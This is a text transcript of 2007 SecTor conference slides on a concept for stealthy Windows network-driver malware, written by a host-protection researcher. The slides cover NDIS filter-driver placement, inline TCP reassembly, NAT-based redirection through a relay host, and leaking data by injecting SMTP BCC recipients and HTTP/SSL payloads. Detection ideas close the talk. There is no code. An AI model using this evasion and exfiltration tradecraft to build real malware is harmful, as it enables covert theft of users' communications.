TCP/IP Perversion

Download Report

Transcript TCP/IP Perversion 

TCP/IP Perversion
Rares Stefan, Third Brigade Inc.
SecTor 2007
1
Introduction

Perspective from a researcher focused on
protecting hosts from malware

Implementing kernel-based protection
mechanisms

Insight into a potential class of network driver
malware
2
The Rise of Silent Malware

Three main areas of interest in malware
R&D:

Delivery and activation

Hiding presence - rootkit techniques

Evasion - Minimize operating noise
Show no signs of activity on the infected system
 Show no traces of network activity on the wire

3
Operational Challenges

Operate on wire data

Active at a layer that guarantees transparency
to the host

Correctly perform inline IP reassembly and
TCP stream reassembly

Allow for arbitrary injection/removal of data in
TCP sessions
4
Operational Challenges…part
deux

Maintain silence on the host:
Never initiate TCP sessions
 Never receive TCP open-session requests
 Do not rely on TCP port splicing if the infected
host is a server
 Do not rely on static motherships if the
infected host is a workstation
 Packet modifications should not be easily
visible in local network traces

5
Operational Challenges…part trois

Maintain silence on the wire



Only make use of legitimate TCP sessions
Do not alter protocol semantics - resistance to
network anomaly detection engines
Piggyback on encrypted channels (SSL) and
multiple TCP sessions for large data transfers
6
Driver Implementation Pre-Vista
User Land
Never
Access to data stream,
not packets
Some interesting
areas
No guaranteed access
to outbound payload
TDI
FW hook
PF hook
TCP/IP
NDIS
NDIS.SYS
Intermediate driver
Miniport driver
NDIS hooking
- Some delivery
challenges
- Most flexibility
- Driver signing issues
- Complete control
over hardware drivers
to transport protocol
communications
7
Rogue Network Driver
Framework


Firewall hook kernel module for basic
packet header operations
IM Filter driver:
Inline IP reassembly
 Inline TCP stream reassembly
 TCP session normalization

8
Packet Header Modifications
9
Infected Workstation
SNAT/DNAT –
SrcIP_Alice -> SrcIP_Bob
DstIP_Bob -> dstIP_server
BOB
https://server
ALICE
DNAT – DstIP_server -> DstIP_Bob
10.0.1.26
10.0.1.124
server
Translated request
reaches server
10
Infected Workstation
SNAT/DNAT –
SrcIP_Alice -> SrcIP_Bob
DstIP_Bob -> dstIP_server
BOB
https://server
ALICE
DNAT – DstIP_server -> DstIP_Bob
10.0.1.26
10.0.1.124
server
Translated request
reaches server
11
Infected Server
Selective DN(P)AT:
ALICE
SrcIP_Alice  SrcIP_server
Dst_Port_443  DstPort_135
telnet server:80
Server
https://server
https request served
12
Infected Server
Selective DN(P)AT:
ALICE
SrcIP_Alice  SrcIP_server
Dst_Port_443  DstPort_135
telnet server:80
Server
https://server
https request served
13
Packet Header Opportunities

Passive covert channels





http://www.invisiblethings.org/papers/passive-covert-channels-linux.pdf
http://www.ouah.org/neural_networks_vs_NUSHU.pdf
http://staff.science.uva.nl/~delaat/snb-2005-2006/p27/report.pdf
Port splicing
Most significant; communicating the original
intent:



DNAT on outgoing SYN – change destination address
to that of the MIM
Insert original dstIP in header fields
MIM double NAT
14
Why Payload Injection ?

Access to packet data

High bandwidth channel

Bypass application proxies

Altering TCP data length on the wire is not
trivial!
15
Inline Injection

Support for IP reassembly on incoming
traffic and IP fragmentation on outbound
traffic

Support for TCP stream reassembly –
datagram reordering, injection of
acknowledgements and resets, among
other things
16
Inline TCP Reassembly

Maintain two edges (pre and post modification):










ISN
MaxSeq
MaxAck
Window
Maximum SeqNo of Filtered Data
Maximum AckNo of Filtered Data
Queue/counter for non Ack-ed datagrams
Queue/counter for not sent datagrams
Needed Window Scale
Actual Window Scale
17
SMTP Injection – Eliminating
Bob from the Equation

Reduces the complexity of MIM and random
redirection

Works with application level proxies

Replace RCPT TO argument or inject additional
RCPT TO (BCC)

Increases the probability detection – SMTP
server logs
18
SMTP Injection
BOB
Alice
Sends Bob message
Driver injects
BCC to Eva
SMTP Server
Bob receives
original message
Eva
So does Eva
19
SMTP Injection Demo
Vid1
20
21
22
HTTP Injection


TCP Headers useless – need to find workaround
Easy workaround but we need to be careful:



Transparent proxies (Initial HTTP request looks
normal, so we’ll always assume we may be
transparently “proxied”)
Direct proxies – easy to spot in HTTP(s) requests
URI & Headers will help us redirect/leak data


Make use of Authorization, Cookies headers – they
won’t be scrubbed
POST data also presents injection opportunities
23
HTTP Injection
google.com
BOB
Web Proxy –
Content Filtering
Change request; Inject Data
http://www.google.com
ALICE
24
HTTP Injection
google.com
BOB
Web Proxy –
Content Filtering
Change request; Inject Data
http://www.google.com
ALICE
25
SSL Injection Demo
somebank.com
BOB
Perimeter Security
Inject Data
https://somebank.com
ALICE
26
SSL Injection Demo
somebank.com
BOB
Perimeter Security
Inject Data
https://somebank.com
ALICE
27
SSL Alice – browser video
28
Detecting Network Driver
Malware

Conventional detection mechanisms


AV, AS signatures; configuration mgmt
New detection mechanisms

Traffic based detection?




Malicious destinations, ISN analysis
Network trace diff – local vs. remote
NDIS based sniffer for better visibility?
Other



Host based application control ineffective
DLP?
…
29
Conclusions

Passive kernel malware difficult to spot

There are significant implementation
challenges for coders

Prevention remains key approach
30
Thank You
31
Infected Workstation
32
Alice – Browser Capture
33
Alice-Bob Network Traces
34
Alice Driver_SNAT
35
Alice_SNAT
36
Back to Infected Workstation
37
Bob_Double_NAT
38
Bob_Double_NAT
39
Bob_Double_NAT
40
Bob_Double_NAT
41
Back to Infected Workstation
42
Infected Server
43
Server network trace
44
Server SNAT&DPAT
45
Back to Infected Server
46
HTTP Injection
47
Alice – browser video
48
Alice – network trace
49
Alice - original data
50
Alice – driver work
51
Alice – driver work
52
Alice – driver work
53
Alice – driver work
54
Back to HTTP Injection
55
Bob – driver work
56
Bob – modified request
57
Bob – driver work
58
Bob – driver work
59
Back to HTTP Injection
60
SSL Injection
61
Alice – original data
62
Post Insert – Wire Noise!
63
Alice – SSL clean
64
Back to SSL Injection
65
Bob – Post modification. Clean!!
66
Back to SSL Injection
67